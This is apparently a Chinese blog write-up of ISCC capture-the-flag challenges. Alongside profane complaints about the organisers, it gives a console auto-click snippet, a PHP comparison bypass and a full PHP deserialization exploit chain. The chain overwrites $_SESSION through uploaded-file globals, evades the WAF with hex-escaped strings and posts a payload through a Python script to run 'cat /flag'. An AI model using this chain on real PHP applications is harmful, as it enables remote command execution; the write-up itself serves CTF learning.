我以后再打 ISCC 我是 SB
咦,没以后了,那就好
本来以为今年能有点长进,结果还是这样,建议以后改名 PYCC,md 这风气就是这么一年年搞坏的
反正是 PY ,全栈都拿不到奖,不定期更新
Misc 不更新了,没啥意思(其实是不会区块链……)
一、练武:
1.ISCC客服冲冲冲(一):
签到题,理论上有三种做法
有个 function.js,混淆的 js 代码,所以第一种做法应该是解混淆?
后面两种其实可以算作一种,利用控制台
打开后自动 Debug 了,其实可以连点
百度一搜一大堆
setInterval(function(){document.getElementById("left_button").click();},1);
当然还可以在 Console 里搜一下,有个 votes,直接设置完事
2.这是啥:
这是啥?这是啥 B,氼🐎招新赛都不出这种题了
3.Web01:
这题也是个 2B 题
robots.txt 告诉我 /src/code/code.txt 这个路径,但是源码在 /code/code.txt 下
<?php
if (isset ($_GET['password'])) {
if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
{
echo '<p>You password must be alphanumeric</p>';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '*-*') !== FALSE)
{
die('Flag: ' . $flag);
}
else
{
echo('<p>*-* have not been found</p>');
}
}
else
{
echo '<p>Invalid password</p>';
}
}
?>不用动脑子,直接科学计数法绕过
4.登陆:
md 我最想骂的就是这个题,不会出题就不要出好🐎?
首先一开始那个 admin 竟然能 123456 弱密码进去,我真是 tmd 服了,QQ 和手机号在那挂着,👴以为要社工,后台那个图片转个码就是 flag
然后还有个 /www.zip,下载下来一看是用的 0CTF 的 piapiapia,改都不带改的,真是服了
5.which is the true iscc:
这题还算有点脑子的
源码审计:
<?php
session_start();
ini_set('max_execution_time', '5');
set_time_limit(5);
$status = "new";
$cmd = "whoami";
$is_upload = false;
$is_unser_finished = false;
$iscc_file = NULL;
class ISCC_Upload {
function __wakeup() {
global $cmd;
global $is_upload;
$cmd = "whoami";
$_SESSION['name'] = randstr(14);
$is_upload = (count($_FILES) > 0);
}
function __destruct() {
global $is_upload;
global $status;
global $iscc_file;
$status = "upload_fail";
if ($is_upload) {
foreach ($_FILES as $key => $value)
$GLOBALS[$key] = $value;
if(is_uploaded_file($iscc_file['tmp_name'])) {
$check = @getimagesize($iscc_file["tmp_name"]);
if($check !== false) {
$target_dir = "/var/tmp/";
$target_file = $target_dir . randstr(10);
if (file_exists($target_file)) {
echo "想啥呢?有东西了……<br>";
finalize();
exit;
}
if ($iscc_file["size"] > 500000) {
echo "东西塞不进去~<br>";
finalize();
exit;
}
if (move_uploaded_file($iscc_file["tmp_name"], $target_file)) {
echo "我拿到了!<br>";
$iscc_file = $target_file;
$status = "upload_ok";
} else {
echo "拿不到:(<br>";
finalize();
exit;
}
} else {
finalize();
exit;
}
} else {
echo "你真是个天才!<br>";
finalize();
exit;
}
}
}
}
class ISCC_ResetCMD {
protected $new_cmd = "echo '新新世界,发号施令!'";
function __wakeup() {
global $cmd;
global $is_upload;
global $status;
$_SESSION['name'] = randstr(14);
$is_upload = false;
if(!isset($this->new_cmd)) {
$status = "error";
$error = "你这罐子是空的!";
throw new Exception($error);
}
if(!is_string($this->new_cmd)) {
$status = "error";
$error = '东西都没给对!';
throw new Exception($error);
}
}
function __destruct() {
global $cmd;
global $status;
$status = "reset";
if($_SESSION['name'] === 'isccIsCciScc1scc') {
$cmd = $this->new_cmd;
}
}
}
class ISCC_Login {
function __wakeup() {
$this->login();
}
function __destruct() {
$this->logout();
}
function login() {
$flag = file_get_contents("/flag");
$pAssM0rd = hash("sha256", $flag);
if($_GET['pAssM0rd'] === $pAssM0rd)
$_SESSION['name'] = "isccIsCciScc1scc";
}
function logout() {
global $status;
unset($_SESSION['name']);
$status = "finish";
}
}
class ISCC_TellMeTruth {
function __wakeup() {
if(!isset($_SESSION['name']))
$_SESSION['name'] = randstr(14);
echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
}
function __destruct() {
echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
}
}
class ISCC_Command {
function __wakeup() {
global $cmd;
global $is_upload;
$_SESSION['name'] = randstr(14);
$is_upload = false;
$cmd = "whoami";
}
function __toString() {
global $cmd;
return "看看你干的好事: {$cmd} <br>";
}
function __destruct() {
global $cmd;
global $status;
global $is_unser_finished;
$status = "cmd";
if($is_unser_finished === true) {
echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
echo "<span style='color:blue'>";
@system($cmd);
echo "</span>";
}
}
}
function randstr($len)
{
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_=';
$randstring = '';
for ($i = 0; $i < $len; $i++) {
$randstring .= $characters[rand(0, strlen($characters))];
}
return $randstring;
}
function waf($s) {
if(stripos($s, "*") !== FALSE)
return false;
return true;
}
function finalize() {
$cmd = "";
$is_upload = false;
unset($_SESSION);
@unlink($iscc_file);
$status = "finish";
echo "<img src='whichisthetrueiscc.gif'><br>";
}
if(isset($_GET['whatareyounongshane'])) {
$whatareyounongshane = $_GET['whatareyounongshane'];
switch ($whatareyounongshane) {
case "src":
highlight_file(__FILE__);
break;
case "cmd":
echo "想越级干好事?还是有门的……";
header('Location: /?%3f=O:12:"ISCC_Command":0:{}');
break;
case "reset":
echo "几辈子积累的好运就在这时~:p";
header('Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}');
break;
case "upload":
$resp = <<<EOF
<form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data">
<input type="file" name="iscc_file">
<input type="submit" value="Upload Image" name="submit">
</form>
EOF;
echo $resp;
break;
case "tellmetruth":
echo base64_decode("PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg==");
header('Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}');
break;
default:
echo "空空如也就是我!";
}
finalize();
die("所以哪个ISCC是真的?<br>");
}
if(isset($_GET['?'])) {
$wtf = waf($_GET{'?'}) ? $_GET['?'] : (finalize() && die("试试就“逝世”!"));
if($goodshit = @unserialize($wtf)) {
$is_unser_finished = true;
}
if(in_array($status, array('new', 'cmd', 'upload_ok', 'upload_fail', 'reset'), true))
finalize();
die("所以哪个ISCC是真的?<br>");
}
?>主逻辑在 ISCC_Command 里的 __destruct()
function __destruct() {
global $cmd;
global $status;
global $is_unser_finished;
$status = "cmd";
if($is_unser_finished === true) {
echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
echo "<span style='color:blue'>";
@system($cmd);
echo "</span>";
}
}找一下 $cmd,在 ISCC_ResetCMD 里的 __destruct() 里有
function __destruct() {
global $cmd;
global $status;
$status = "reset";
if($_SESSION['name'] === 'isccIsCciScc1scc') {
$cmd = $this->new_cmd;
}
}主要就是这个 $_SESSION['name'],再看,发现在 ISCC_Login 里有个东西
function login() {
$flag = file_get_contents("/flag");
$pAssM0rd = hash("sha256", $flag);
if($_GET['pAssM0rd'] === $pAssM0rd)
$_SESSION['name'] = "isccIsCciScc1scc";
}但这是个坑,这玩意明显不能通过 login() 整出来,那在哪嘞
在 ISCC_Upload 的 __destruct() 里
foreach ($_FILES as $key => $value)
$GLOBALS[$key] = $value;所以上传图片的时候,顺带着传个 text 就可以,覆盖一下
类似这种东西
Content-Disposition: form-data; name="_SESSION"; filename="isccIsCciScc1scc"
Content-Type: text/plain
1ndweb再说序列化顺序
其实分析下来也知道一共就用到 3 个类,所以直接这样:
ISCC_Upload() => ISCC_ResetCMD() => ISCC_Command()
然后有个 waf()
直接大写 S + 16 进制绕过
<?php
class ISCC_Upload {
public $status;
}
class ISCC_Command {
}
class ISCC_ResetCMD {
public $cmd;
public $status;
protected $new_cmd = "cat /flag";
}
$a = new ISCC_Upload();
$a->status = new ISCC_ResetCMD();
$a->status->cmd = new ISCC_Command();
$b = serialize($a);
echo urlencode($b);
//
最后的?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D写个脚本就行,跑一下
import requests
targeturl="http://39.96.91.106:7050/"
files={
'iscc_file':("b",open("1.jpg","rb")),
"_SESSION":("isccIsCciScc1scc","1ndweb")
}
headers={
'Cookie':"PHPSESSID=fe2967c292ff6fcc72f8c2b73970fb2f"
}
r=requests.post(url=targeturl+"?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D",files=files,headers=headers)
print(r.text)
二、擂台赛:
1.tornado:
啥B,拿 18 年护网杯的题目来混,既然这样👴拿国外的 CTF 题目放上来岂不是更好?反正都没几个人打,百度还搜不到
0 条评论